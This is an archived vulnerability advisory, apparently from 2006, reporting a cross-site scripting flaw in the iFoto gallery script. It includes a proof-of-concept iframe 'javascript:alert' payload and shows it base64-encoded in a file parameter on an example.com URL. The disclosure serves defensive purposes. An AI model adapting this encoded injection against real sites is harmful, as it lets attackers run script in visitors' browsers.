Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13062
HistoryJun 10, 2006 - 12:00 a.m.

iFoto v0.20-06/06/06

2006-06-1000:00:00
vulners.com
8

iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein
base64.

The code we'll be using is javascript in an iframe tag. [IFRAME
SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+